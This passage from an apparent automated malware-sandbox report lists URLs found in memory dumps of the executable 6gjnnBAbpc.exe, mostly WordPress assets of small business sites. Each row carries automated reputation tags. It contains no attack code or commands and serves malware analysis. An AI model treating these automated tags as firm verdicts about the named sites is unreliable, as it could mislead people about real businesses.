6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.com-sit.com/wp-content/themes/betheme/js/plugins/countdown.min.js?ver=26.6	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.com-sit.com/wp-content/uploads/2018/11/logo-COM-SIT.png	6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2-1170x658.png	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://schema.org/WebPage	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.488520176.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.40	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yumgiskor.kz/	6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myropcb.com/wp-json/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D97000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D7C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-50x18.jpg	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.pcgrate.com/checkout/	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pohlfood.com/privacy-policy/	6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wifi4all.nl/MP	6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://layerslider.com	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://com-sit.com/leistungen/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pohlfood.com/#breadcrumb	6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
